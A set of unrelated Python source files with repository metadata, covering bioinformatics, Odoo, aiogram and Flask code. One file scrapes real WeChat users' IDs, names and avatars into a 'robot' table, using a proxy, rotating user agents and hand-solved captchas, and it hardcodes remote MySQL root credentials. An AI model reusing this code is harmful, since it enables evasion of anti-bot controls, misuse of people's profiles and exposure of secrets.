| permissive | luphord/remcall | 0bef9bbf13be697645f7b93fbd9a5e3ee9afd97b | 31419ff0f5c21ea2d90f9cabdaec85b6eebcaa12 | refs/heads/trunk | 2021-12-25T23:44:39.888706 | 2021-12-03T08:15:58 | 2021-12-03T08:15:58 | 165,920,464 | 0 | 0 | MIT | 2021-12-03T08:15:59 | 2019-01-15T20:42:12 | Python | UTF-8 | Python | false | false | 634 | py | from .core import Type, Interface, Enum, Record, Primitive, Method, \
string, int8, int16, int32, int64, uint8, uint16, \
uint32, uint64, float32, float64, void, boolean, \
date, datetime, time, primitive_types, Array, Schema
from .base import assert_name
__all__ = ['Type', 'Interface', 'Enum', 'Record', 'Primitive', 'Method',
'string', 'int8', 'int16', 'int32', 'int64', 'uint8', 'uint16',
'uint32', 'uint64', 'float32', 'float64', 'void', 'boolean',
'date', 'datetime', 'time', 'assert_name', 'primitive_types',
'Array', 'Schema']
| [
"[email protected]"
]
| |
7dd54bed4c22108fdd325ab8efa1459e4fdd1d11 | a47192d5abd5f34f63b2c0e27b954ae07de47302 | /day20/range.py | d17de1cba89cc621b63647419a191c9a16be7aa0 | []
| no_license | Godsmith/adventofcode2016 | 46639af6e015f0a024cde32ba0a1f98268899f4f | e036fb68bb53b9c79aa143b6c4645db218f77862 | refs/heads/master | 2020-06-15T04:21:21.012830 | 2017-01-10T21:52:30 | 2017-01-10T21:52:30 | 75,330,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 641 | py | class Range:
def __init__(self, low, high):
self.low = low
self.high = high
def __repr__(self):
return 'Range<%s-%s>' % (self.low, self.high)
def __hash__(self):
return hash(tuple([self.low, self.high]))
def __eq__(self, other):
return self.low == other.low and self.high == other.high
@classmethod
def combine(cls, ranges):
lowest = min([r.low for r in ranges])
highest = max([r.high for r in ranges])
return cls(lowest, highest)
def can_be_combined(self, range_):
return not (self.high < range_.low - 1 or self.low > range_.high + 1)
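# Illustrative usage (added): adjacent ranges merge, since
# can_be_combined allows a gap of at most one.
if __name__ == '__main__':
    a, b = Range(0, 4), Range(5, 9)
    if a.can_be_combined(b):
        print(Range.combine([a, b]))  # Range<0-9>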
| [
"[email protected]"
]
| |
cc748c6aadec1a2627e7132cfd476d19c690933c | f7127398e6bc60cdece53014dfebb58aa99c0fbd | /aiogram_dialog/widgets/kbd/checkbox.py | b6a4e010a29614fdc9277b51a146f248f8d6f885 | []
| no_license | drforse/aiogram_dialog | 25fcae2579e9b37c43a41303232d009e04316c6a | 984496ee7818d7896235d20f30bb662f56293385 | refs/heads/master | 2023-02-28T21:39:53.331894 | 2021-02-05T05:50:15 | 2021-02-05T05:50:15 | 336,158,550 | 0 | 0 | null | 2021-02-05T03:58:44 | 2021-02-05T03:58:43 | null | UTF-8 | Python | false | false | 1,300 | py | from typing import Callable, Optional, Union, Dict, Awaitable
from aiogram.types import CallbackQuery
from aiogram_dialog.manager.manager import DialogManager
from aiogram_dialog.widgets.text import Text, Case
from .button import Button
OnStateChanged = Callable[[CallbackQuery, "Checkbox", DialogManager], Awaitable]
class Checkbox(Button):
def __init__(self, checked_text: Text, unchecked_text: Text,
id: str,
on_state_changed: Optional[OnStateChanged] = None,
when: Union[str, Callable] = None):
text = Case({True: checked_text, False: unchecked_text}, selector=self._is_text_checked)
super().__init__(text, id, self._on_click, when)
self.on_state_changed = on_state_changed
async def _on_click(self, c: CallbackQuery, button: Button, manager: DialogManager):
manager.context.set_data(self.widget_id, not self.is_checked(manager), internal=True)
if self.on_state_changed:
await self.on_state_changed(c, self, manager)
def _is_text_checked(self, data: Dict, case: Case, manager: DialogManager) -> bool:
return self.is_checked(manager)
def is_checked(self, manager: DialogManager) -> bool:
return manager.context.data(self.widget_id, False, internal=True)
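# Hedged usage sketch (comments only; `Const` is assumed from
# aiogram_dialog.widgets.text, mirroring the imports above):
#
#   check = Checkbox(
#       Const("[x] option"),  # shown while checked
#       Const("[ ] option"),  # shown while unchecked
#       id="opt",
#       on_state_changed=my_handler,  # async (c, checkbox, manager) callback
#   )
#   # read the state back later with check.is_checked(manager)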
| [
"[email protected]"
]
| |
fef0f186e3b388ef8dbb58d698766de6b8a4cbb0 | dee9432b12b8d5667ba3f58889344f89a032229d | /food/robots.py | 62e74a1df46393c50327b29f48029c5a8199bdf9 | []
| no_license | rolllyroman/lucas | a39743d697483f962617428bc61bfc053e9b4095 | e219ed3fc69ad36132ac4361c1766b279269323c | refs/heads/master | 2020-04-16T06:48:55.329438 | 2019-01-24T06:20:44 | 2019-01-24T06:20:44 | 150,229,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,006 | py | #coding:utf-8
import requests
import time
from lxml import etree
import json
# import MySQLdb
import pymysql
import random
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
from constant import USER_AGENT
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chromeOptions = webdriver.ChromeOptions()
# set an HTTP proxy for Chrome
chromeOptions.add_argument("--proxy-server=http://112.85.167.11:9999")
# note: no spaces around '=', i.e. not --proxy-server = http://202.20.16.82:10152
driver = webdriver.Chrome(chrome_options = chromeOptions)
# headless mode (currently disabled)
# chrome_options = Options()
# chrome_options.add_argument('--headless')
# driver = webdriver.Chrome(chrome_options=chrome_options)
# driver = webdriver.Chrome()
HEADERS = {'Accept': 'text/html, application/xhtml+xml, image/jxr, */*',
'Accept-Language':'zh-Hans-CN, zh-Hans; q=0.5',
'Connection':'Keep-Alive',
# 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'}
'User-Agent':random.choice(USER_AGENT),
}
BASIC_URL = "https://weixin.sogou.com/weixin?query=%s&_sug_type_=&s_from=input&_sug_=n&type=1&page=%s&ie=utf8"
conn = pymysql.connect(host="119.23.52.3",user="root",passwd="168mysql",db="haha",charset="utf8")
conn.autocommit(1) # conn.autocommit(True)
cursor = conn.cursor()
proxies_queue = []
# def put_proxy_queue():
# url = "https://proxyapi.mimvp.com/api/fetchsecret.php?orderid=862060912114100297&num=5&http_type=3&result_fields=1,2,3"
# resp = requests.get(url)
# content = resp.content
# datas = content.split('\r\n')
# for data in datas:
# http_ip = data.split(',')[0]
# https_ip = http_ip.split(":")[0] + data.split(',')[-1]
# proxies = {
# "http":http_ip,
# "https":https_ip,
# }
# try:
# print "测试结果:%s"%requests.get("http://www.baidu.com",proxies=proxies)
# except:
# print "失败proxies:%s"%proxies
# else:
# proxies_queue.append(proxies)
# print "now proxies_queue:%s"%proxies_queue
# def get_proxies():
# print "now proxies_queue:%s"%proxies_queue
# if len(proxies_queue) < 20:
# for i in range(1,6):
# print "wait for put proxy... %s"%i
# time.sleep(1)
# put_proxy_queue()
# res = random.choice(proxies_queue)
# try:
# requests.get("http://www.baidu.com",proxies=res)
# except:
# proxies_queue.remove(res)
# return get_proxies()
# else:
# return res
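# A compact working variant of the commented-out proxy check above (added
# for illustration; the probe URL mirrors the one used there).
def check_proxy(proxies, test_url="http://www.baidu.com"):
    """Return True if the proxy dict answers within 5 seconds."""
    try:
        requests.get(test_url, proxies=proxies, timeout=5)
        return True
    except Exception:
        return False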
def if_list_code(weixins,detail_srcs):
if len(weixins) == 1:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_name("c")
code_label.send_keys(" ") # 防止发送不成功
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("submit")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
print "weixins:%s"%weixins
if len(weixins) == 1:
return if_list_code(weixins,detail_srcs)
return weixins,detail_srcs
def search_list(word):
print "search_list:%s"%word
for i in range(1,11):
url = BASIC_URL%(word,i)
# resp = requests.get(url,headers=HEADERS)
driver.get(url)
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
# print resp.content.decode()
# print "============="
# print url
# print "============="
# print resp.status_code
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
weixins,detail_srcs = if_list_code(weixins,detail_srcs)
if not weixins:
break
deal_detail(weixins,detail_srcs)
def get_words():
words = set()
url = "https://hanyu.baidu.com/s?wd=%E7%99%BE%E5%AE%B6%E5%A7%93&from=poem"
resp = requests.get(url,headers=HEADERS)
resp.encoding = "utf-8"
html = resp.text
for w in html:
words.add(w)
return words
def main():
print "main start..."
words = get_words()
for w in words:
sql = "select word from got_word where word = %s"
cursor.execute(sql,(w,))
if cursor.fetchone():
print "%s 已搜过,跳过..."%w
continue
print "开始搜索:%s"%w
search_list(w)
sql = "insert into got_word(word) values(%s)"
cursor.execute(sql,(w,))
def if_detail_code(heads,names):
    # captcha shown on the detail page
if not names:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_id("input")
        code_label.send_keys(" ")  # guard against a dropped send
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("bt")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
if not names:
return if_detail_code(heads,names)
return heads,names
def deal_detail(weixins,detail_srcs):
print "deal_detail start..."
for i,weixin in enumerate(weixins):
sql = "select weixin from robot where weixin = %s"
cursor.execute(sql,(weixin,))
res = cursor.fetchone()
if res:
continue
src = detail_srcs[i]
        # name and avatar on the detail page
# resp = requests.get(src,headers=HEADERS)
# html = etree.HTML(resp.content)
driver.get(src)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
heads,names = if_detail_code(heads,names)
head = heads[0].replace("http","https")
name = names[0].strip()
sql = "insert into robot(weixin,name,head) values(%s,%s,%s)"
cursor.execute(sql,(weixin,name,head))
print weixin,name,head,"ok!"
time.sleep(1)
# def test2():
# url = "https://weixin.sogou.com/weixin?query=%E6%9D%8E&_sug_type_=&s_from=input&_sug_=n&type=1&page=222&ie=utf8"
# resp = requests.get(url,headers=HEADERS)
# html = etree.HTML(resp.content)
# weixins = html.xpath("//label/text()")
# print "==========================="
# print weixins
# print "==========================="
if __name__ == "__main__":
main()
cursor.close()
conn.close()
driver.close()
| [
"[email protected]"
]
| |
8c8b678d13701ba585b3238bd029821548cc4783 | f7550c4964dc8f3c59dbcebe39e947bd6a264dba | /1.Recorsions - 1/String into Int.py | 49eb468cd5f79f87fb2aa7dff14c15aa4c47eb1d | []
| no_license | Jashwanth-k/Data-Structures-and-Algorithms | db5e2e30932e0a35db578c19ae6cff9f147b7c3d | 1ebf9986999a474cb094f3ab04616a46f2887043 | refs/heads/main | 2023-08-25T02:57:17.394322 | 2021-10-11T15:27:56 | 2021-10-11T15:27:56 | 402,448,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | def str_to_int(s):
l = len(s)
if l == 1:
return ord(s[0]) - ord('0')
a = str_to_int(s[1:])
b = ord(s[0]) - ord('0')
output = b*(10**(l-1)) + a
return output
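# Worked example of the recursion (added for illustration):
# str_to_int('123') = 1*10**2 + str_to_int('23')
#                   = 100 + 2*10**1 + str_to_int('3')
#                   = 100 + 20 + 3 = 123
assert str_to_int('123') == 123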
s = '1234'  # must be a non-empty digit string; '' would recurse without reaching the base case
print(str_to_int(s)) | [
"[email protected]"
]
| |
2aa7e05f460ae0b7d0f6ea6a66312db082a1ce07 | da052c0bbf811dc4c29a83d1b1bffffd41becaab | /core/serial_number_expired_date/models/stock_picking.py | 6b51aa2baf397a198e54c46a84b406b3800e23da | []
| no_license | Muhammad-SF/Test | ef76a45ad28ac8054a4844f5b3826040a222fb6e | 46e15330b5d642053da61754247f3fbf9d02717e | refs/heads/main | 2023-03-13T10:03:50.146152 | 2021-03-07T20:28:36 | 2021-03-07T20:28:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,983 | py | # -*- coding: utf-8 -*-
import logging
from odoo import models, fields, api , _
import datetime
# from dateutil.relativedelta import relativedelta
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT, float_compare, float_round
class PackOperation(models.Model):
_inherit = 'stock.pack.operation.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
class Picking(models.Model):
_inherit = "stock.picking"
def _create_lots_for_picking(self):
Lot = self.env['stock.production.lot']
for pack_op_lot in self.mapped('pack_operation_ids').mapped('pack_lot_ids'):
if not pack_op_lot.lot_id:
lot = Lot.create({'name': pack_op_lot.lot_name, 'product_id': pack_op_lot.operation_id.product_id.id, 'use_date':pack_op_lot.expired_date,'expired_date':pack_op_lot.expired_date})
pack_op_lot.write({'lot_id': lot.id})
# TDE FIXME: this should not be done here
self.mapped('pack_operation_ids').mapped('pack_lot_ids').filtered(lambda op_lot: op_lot.qty == 0.0).unlink()
create_lots_for_picking = _create_lots_for_picking
class Quant(models.Model):
_inherit = "stock.quant"
expired_date = fields.Date(related='lot_id.use_date',string='Expiry Date', store=True)
class StockProductionLot(models.Model):
_inherit = 'stock.production.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
    # Assign use/life/alert/removal dates from the product's shelf-life settings
@api.model
def create(self, vals):
dates = self._get_dates(vals.get('product_id'))
product_id = vals.get('product_id')
exp_date = vals.get('expired_date')
if exp_date:
expired_date = datetime.datetime.strptime(exp_date, DEFAULT_SERVER_DATETIME_FORMAT)
else:
expired_date = datetime.datetime.now()
product = self.env['product.product'].browse(product_id)
if product:
for d in dates.keys():
if d in ['use_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.use_time)
vals['use_date'] = fields.Datetime.to_string(date)
if d in ['life_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.life_time)
vals['life_date'] = fields.Datetime.to_string(date)
if d in ['alert_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.alert_time)
vals['alert_date'] = fields.Datetime.to_string(date)
if d in ['removal_date']:
date = expired_date
vals['removal_date'] = fields.Datetime.to_string(date)
return super(StockProductionLot, self).create(vals)
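# Standalone sketch of the date arithmetic used in create() above (added;
# the day counts are illustrative, real ones come from the product fields).
if __name__ == "__main__":
    expired = datetime.datetime(2021, 1, 31)
    removal_time, use_time = 5, 30
    use_date = (expired - datetime.timedelta(days=removal_time)
                + datetime.timedelta(days=use_time))
    print(use_date)  # 2021-02-25 00:00:00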
| [
"[email protected]"
]
| |
1939165261e9bc871d33a3d26d3408e0baaf61a6 | cd0591c773702d66d964e325f494b17918617949 | /hgvs/utils/altseq_to_hgvsp.py | f47725b71196b3a2abc09f81931572745eaf3ced | [
"Apache-2.0"
]
| permissive | SunbyMoon/hgvs | 9de0f1a2ddc134f072e490b989982d6e90bd164a | 2f348d53ee542576d0035a54757daa5dcd077e6b | refs/heads/master | 2020-03-22T15:51:35.995761 | 2018-07-03T04:19:09 | 2018-07-03T04:19:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,292 | py | # -*- coding: utf-8 -*-
"""Utility class for creating an hgvsp SequenceVariant object,
given a transcript with variants applied.
Used in hgvsc to hgvsp conversion.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import hgvs
from ..edit import (AAExt, AAFs, AARefAlt, AASub, Dup)
from ..exceptions import (HGVSError)
from ..location import (AAPosition, Interval)
from ..posedit import (PosEdit)
from six.moves import range
DBG = False
class AltSeqToHgvsp(object):
def __init__(self, ref_data, alt_data):
"""Constructor
:param ref_data: reference transcript record
:type ref_data: recordtype
:param alt_data: alt transcript record
:type ref_data: recordtype
"""
self._ref_data = ref_data
self._alt_data = alt_data
self._protein_accession = self._ref_data.protein_accession
self._ref_seq = self._ref_data.aa_sequence
self._alt_seq = self._alt_data.aa_sequence
self._is_frameshift = self._alt_data.is_frameshift
self._frameshift_start = self._alt_data.frameshift_start
self._is_substitution = self._alt_data.is_substitution
self._is_ambiguous = self._alt_data.is_ambiguous
if DBG:
print("len ref seq:{} len alt seq:{}".format(len(self._ref_seq), len(self._alt_seq)))
print("fs start:{} protein ac:{}".format(self._frameshift_start, self._protein_accession))
print(self._ref_seq)
print(self._alt_seq)
print("aa variant start: {}".format(self._alt_data.variant_start_aa))
print(self._ref_data.transcript_sequence)
print(self._alt_data.transcript_sequence)
def build_hgvsp(self):
"""Compare two amino acid sequences; generate an hgvs tag from the output
:return list of variants in sequence order
:rtype list of dict
"""
variants = []
if not self._is_ambiguous and len(self._alt_seq) > 0:
do_delins = True
if self._ref_seq == self._alt_seq:
# Silent p. variant
start = self._alt_data.variant_start_aa
if start - 1 < len(self._ref_seq):
deletion = self._ref_seq[start - 1]
insertion = deletion
else:
start = ""
deletion = ""
insertion = ""
self._is_frameshift = False
variants.append({"start": start, "ins": insertion, "del": deletion})
do_delins = False
elif self._is_substitution:
if len(self._ref_seq) == len(self._alt_seq):
diff_pos = [(i, self._ref_seq[i], self._alt_seq[i]) for i in range(len(self._ref_seq))
if self._ref_seq[i] != self._alt_seq[i]]
if len(diff_pos) == 1:
(start, deletion, insertion) = diff_pos[0]
variants.append({"start": start + 1, "ins": insertion, "del": deletion})
do_delins = False
elif (self._alt_seq[self._alt_data.variant_start_aa - 1] == "*"
and self._ref_seq[self._alt_data.variant_start_aa - 1] != "*"):
# introduced stop codon
deletion = self._ref_seq[self._alt_data.variant_start_aa - 1:]
variants.append({"start": self._alt_data.variant_start_aa, "ins": "*", "del": deletion})
do_delins = False
if do_delins:
if self._alt_data.is_frameshift:
start = self._alt_data.variant_start_aa - 1
aa_start = self._alt_data.variant_start_aa
while self._ref_seq[start] == self._alt_seq[start]:
start += 1
aa_start += 1
insertion = list(self._alt_seq[start:])
deletion = list(self._ref_seq[start:])
variants.append({"start": aa_start, "ins": insertion, "del": deletion})
else: # non-frameshifting delins or dup
# get size diff from diff in ref/alt lengths
start = self._alt_data.variant_start_aa - 1
aa_start = self._alt_data.variant_start_aa
delta = len(self._alt_seq) - len(self._ref_seq)
while self._ref_seq[start] == self._alt_seq[start]:
start += 1
aa_start += 1
offset = start + abs(delta)
if delta > 0: # net insertion
insertion = list(self._alt_seq[start:offset])
deletion = []
ref_sub = self._ref_seq[start:]
alt_sub = self._alt_seq[offset:]
elif delta < 0: # net deletion
insertion = []
deletion = list(self._ref_seq[start:offset])
ref_sub = self._ref_seq[offset:]
alt_sub = self._alt_seq[start:]
else:
insertion = []
deletion = []
ref_sub = self._ref_seq[start:]
alt_sub = self._alt_seq[start:]
# from start, get del/ins out to last difference
diff_indices = [i for i in range(len(ref_sub)) if ref_sub[i] != alt_sub[i]]
if diff_indices:
max_diff = diff_indices[-1] + 1
insertion.extend(list(alt_sub[:max_diff]))
deletion.extend(list(ref_sub[:max_diff]))
variants.append({"start": aa_start, "ins": insertion, "del": deletion})
if DBG:
print(variants)
if self._is_ambiguous:
var_ps = [
self._create_variant(None, None, '', '', acc=self._protein_accession, is_ambiguous=self._is_ambiguous)
]
elif len(self._alt_seq) == 0:
var_ps = [
self._create_variant(
None,
None,
'',
'',
acc=self._protein_accession,
is_ambiguous=self._is_ambiguous,
is_no_protein=True)
]
else:
var_ps = [self._convert_to_sequence_variants(x, self._protein_accession) for x in variants]
if len(var_ps) > 1:
raise HGVSError("Got multiple AA variants - not supported")
return var_ps[0]
#
# internal methods
#
def _convert_to_sequence_variants(self, variant, acc):
"""Convert AA variant to an hgvs representation
:param variant: contains start, del, and ins
:type variant: dict
:param acc: protein accession
:type acc: str
:return hgvs string
:rtype str
"""
start = variant['start']
insertion = ''.join(variant['ins'])
deletion = ''.join(variant['del'])
# defaults
is_dup = False # assume not dup
fsext_len = None # fs or ext length
is_sub = False
is_ext = False
if start == 1: # initial methionine is modified
aa_start = aa_end = AAPosition(base=start, aa=deletion)
ref = ''
alt = ''
self._is_ambiguous = True # side-effect
if insertion and insertion.find("*") == 0: # stop codon at variant position
aa_start = aa_end = AAPosition(base=start, aa=deletion[0])
ref = ''
alt = '*'
is_sub = True
elif start == len(self._ref_seq): # extension
if self._alt_seq[-1] == '*':
fsext_len = len(insertion) - len(deletion) # don't include the former stop codon
else:
fsext_len = '?'
subst_at_stop_codon = insertion[0]
aa_start = aa_end = AAPosition(base=start, aa='*')
ref = ''
alt = subst_at_stop_codon
is_ext = True
elif self._is_frameshift: # frameshift
aa_start = aa_end = AAPosition(base=start, aa=deletion[0])
ref = ''
try:
fsext_len = str(insertion.index("*") + 1) # start w/ 1st change; ends w/ * (inclusive)
except ValueError:
fsext_len = "?"
alt = insertion[0]
else: # no frameshift - sub/delins/dup
if insertion == deletion: # silent
aa_start = aa_end = AAPosition(base=start, aa=deletion)
ref = alt = ''
elif len(insertion) == len(deletion) == 1: # substitution
aa_start = aa_end = AAPosition(base=start, aa=deletion)
ref = ''
alt = insertion
is_sub = True
elif len(deletion) > 0: # delins OR deletion OR stop codon at variant position
ref = deletion
end = start + len(deletion) - 1
if len(insertion) > 0: # delins
aa_start = AAPosition(base=start, aa=deletion[0])
if end > start:
aa_end = AAPosition(base=end, aa=deletion[-1])
else:
aa_end = aa_start
alt = insertion
else: # deletion OR stop codon at variant position
if len(deletion) + start == len(self._ref_seq): # stop codon at variant position
aa_start = AAPosition(base=start, aa=deletion[0])
aa_end = AAPosition(base=start, aa=deletion[0])
ref = ''
alt = '*'
is_sub = True
else: # deletion
aa_start = AAPosition(base=start, aa=deletion[0])
if end > start:
aa_end = AAPosition(base=end, aa=deletion[-1])
else:
aa_end = aa_start
alt = None
elif len(deletion) == 0: # insertion OR duplication OR extension
is_dup, dup_start = self._check_if_ins_is_dup(start, insertion)
if is_dup: # duplication
dup_end = dup_start + len(insertion) - 1
aa_start = AAPosition(base=dup_start, aa=insertion[0])
aa_end = AAPosition(base=dup_end, aa=insertion[-1])
ref = alt = None
else: # insertion
start -= 1
end = start + 1
aa_start = AAPosition(base=start, aa=self._ref_seq[start - 1])
aa_end = AAPosition(base=end, aa=self._ref_seq[end - 1])
ref = None
alt = insertion
else: # should never get here
raise ValueError("unexpected variant: {}".format(variant))
var_p = self._create_variant(
aa_start,
aa_end,
ref,
alt,
fsext_len=fsext_len,
is_dup=is_dup,
acc=acc,
is_ambiguous=self._is_ambiguous,
is_sub=is_sub,
is_ext=is_ext)
return var_p
def _check_if_ins_is_dup(self, start, insertion):
"""Helper to identify an insertion as a duplicate
:param start: 1-based insertion start
:type start: int
:param insertion: sequence
:type insertion: str
        :return: (is duplicate, 1-based variant start)
        :rtype: (bool, int)
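        Worked example (hypothetical sequences, not from the original source):
        with self._ref_seq = "MAVLK", an insertion "AV" reported at 1-based
        start 4 gives dup_candidate_start = 4 - 2 - 1 = 1, so dup_candidate is
        the "AV" at reference positions 2-3 and the method returns (True, 2).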
"""
is_dup = False # assume no
variant_start = None
dup_candidate_start = start - len(insertion) - 1
dup_candidate = self._ref_seq[dup_candidate_start:dup_candidate_start + len(insertion)]
if insertion == dup_candidate:
is_dup = True
variant_start = dup_candidate_start + 1
return is_dup, variant_start
def _create_variant(self,
start,
end,
ref,
alt,
fsext_len=None,
is_dup=False,
acc=None,
is_ambiguous=False,
is_sub=False,
is_ext=False,
is_no_protein=False):
"""Creates a SequenceVariant object"""
if is_ambiguous:
posedit = None
else:
interval = Interval(start=start, end=end)
# Note - order matters
if is_no_protein:
edit = '0'
elif is_sub:
edit = AASub(ref=ref, alt=alt)
elif is_ext:
edit = AAExt(ref=ref, alt=alt, aaterm='*', length=fsext_len)
elif self._is_frameshift:
edit = AAFs(ref=ref, alt=alt, length=fsext_len)
elif is_dup:
edit = Dup()
elif ref == alt == '':
edit = AARefAlt(ref='', alt='')
else:
edit = AARefAlt(ref=ref, alt=alt)
posedit = PosEdit(pos=interval, edit=edit, uncertain=hgvs.global_config.mapping.inferred_p_is_uncertain)
var_p = hgvs.sequencevariant.SequenceVariant(acc, 'p', posedit)
return var_p
# <LICENSE>
# Copyright 2018 HGVS Contributors (https://github.com/biocommons/hgvs)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# </LICENSE>
| [
"[email protected]"
]
| |
20dd8bac432917f44ec65e02ad42a37c002d8dc7 | dd6c759081c1490c624de00f9519216613de5293 | /src/ui/__init__.py | 02186177946aec017837c2690ac545a6690800ea | [
"MIT"
]
| permissive | forcemain/SwarmOps | 76151fd31dff5288f3bc66a24c03547c6d9bb142 | 07675b362c83ce74bae13cb1c9ee627dc4ee25ed | refs/heads/master | 2021-06-18T12:41:11.960706 | 2017-05-10T01:04:44 | 2017-05-10T01:04:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,826 | py | # -*- coding:utf-8 -*-
#
# SwarmOps views for ui
#
from flask import Blueprint, render_template, url_for, redirect, g, abort
from utils.public import logger, login_required
ui_blueprint = Blueprint("ui", __name__, template_folder="templates", static_folder='static')
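# Registration sketch (hypothetical; the Flask app object lives elsewhere in
# this project and is not part of this file):
#   from flask import Flask
#   app = Flask(__name__)
#   app.register_blueprint(ui_blueprint)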
''' swarm route'''
@ui_blueprint.route("/")
@ui_blueprint.route("/swarm/")
@login_required
def index():
return render_template("swarm/swarm.html")
@ui_blueprint.route("/swarm/add/")
@login_required
def swarm_add():
return render_template("swarm/add.html")
@ui_blueprint.route("/swarm/init/")
@login_required
def swarm_init():
return render_template("swarm/init.html")
'''service route'''
@ui_blueprint.route("/service/")
@login_required
def service():
return render_template("service/service.html")
@ui_blueprint.route("/service/delete/")
@login_required
def service_delete():
return render_template("service/delete.html")
@ui_blueprint.route("/service/update/")
@login_required
def service_update():
return render_template("service/update.html")
@ui_blueprint.route("/service/create/")
@login_required
def service_create():
return render_template("service/create.html")
@ui_blueprint.route("/service/detail/")
@login_required
def service_detail():
return render_template("service/detail.html")
@ui_blueprint.route("/service/nginx/")
@login_required
def service_nginx():
return render_template("service/nginx.html")
'''node route'''
@ui_blueprint.route("/node/")
@login_required
def node():
return render_template("node/node.html")
@ui_blueprint.route("/node/add/")
@login_required
def node_add():
return render_template("node/add.html")
@ui_blueprint.route("/node/update/")
@login_required
def node_update():
return render_template("node/update.html")
@ui_blueprint.route("/node/delete/")
@login_required
def node_delete():
return render_template("node/delete.html")
'''misc route'''
@ui_blueprint.route("/misc/")
@login_required
def misc():
return render_template("misc.html")
@ui_blueprint.route("/storage/")
@login_required
def storage():
return render_template("misc/storage.html")
'''network route'''
@ui_blueprint.route("/network/")
@login_required
def network():
return render_template("network/network.html")
'''registry route'''
@ui_blueprint.route("/registry/")
@login_required
def registry():
return render_template("registry/registry.html")
@ui_blueprint.route("/registry/<namespace>/<repository_name>/")
@login_required
def registryImageName(namespace, repository_name):
return render_template("registry/imageName.html", imageName="{}/{}".format(namespace, repository_name).replace("_/", ""))
@ui_blueprint.route("/registry/<imageId>/")
@login_required
def registryImageId(imageId):
return render_template("registry/imageId.html", imageId=imageId)
| [
"[email protected]"
]
| |
b783d5bf51d4bb8dd0b44dab30f43382f53dfeb2 | bb9ab2b88c990377e58fd2b719a60f2e4a4689ce | /est-sfs/01_vcf_to_estsfs.py | 8304ae2a0ee0641c79e0ee2e8fe764171fc6c5b3 | []
| no_license | silvewheat/biocal-cli | 7ded0e05c134c932a7dd45130c546cd607b443b9 | 134a0bf4f0d318de50a92a1e72d18c13580e64e2 | refs/heads/master | 2022-12-11T21:04:25.240272 | 2022-11-28T02:40:02 | 2022-11-28T02:40:02 | 147,090,111 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,551 | py | # -*- coding: utf-8 -*-
"""
Created on 2022-10-14
@author: Yudongcai
@Email: [email protected]
"""
import re
import typer
import numpy as np
from cyvcf2 import VCF
from collections import Counter, defaultdict
def convert_gts(gt_bases):
gt_split = re.compile(r'[/|]')
bases = []
for base in gt_bases:
bases.extend(gt_split.split(base))
return bases
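# Example (illustrative): convert_gts(["A/T", "C|C"]) splits each genotype
# string on "/" or "|" and flattens the result to ['A', 'T', 'C', 'C'].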
def main(vcffile: str = typer.Argument(..., help="input vcf file"),
focalsamples: str = typer.Argument(..., help="sample list for focal samples"),
outgroup1: str = typer.Argument(..., help="sample list for outgroup1"),
outgroup2: str = typer.Argument(..., help="sample list for outgroup2"),
outgroup3: str = typer.Argument(..., help="sample list for outgroup3"),
outprefix: str = typer.Argument(..., help="output prefix")):
focal_samples = [x.strip() for x in open(focalsamples)]
outgroup1_samples = [x.strip() for x in open(outgroup1)]
outgroup2_samples = [x.strip() for x in open(outgroup2)]
outgroup3_samples = [x.strip() for x in open(outgroup3)]
samples = focal_samples + outgroup1_samples + outgroup2_samples + outgroup3_samples
print(f'focal samples: {len(focal_samples)}\noutgroup1: {len(outgroup1_samples)}\noutgroup2: {len(outgroup2_samples)}\noutgroup3: {len(outgroup3_samples)}')
with open(f'{outprefix}_siteInfo.tsv', 'w') as f1, open(f'{outprefix}_datafile', 'w') as f2:
base2index = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
f1.write('CHROM\tPOS\tREF\tALT\tmajorAllele\tminorAllele\n')
vcf = VCF(vcffile, gts012=True, samples=samples)
focal_selection = [True if x in focal_samples else False for x in vcf.samples]
outgroup1_selection = [True if x in outgroup1_samples else False for x in vcf.samples]
outgroup2_selection = [True if x in outgroup2_samples else False for x in vcf.samples]
outgroup3_selection = [True if x in outgroup3_samples else False for x in vcf.samples]
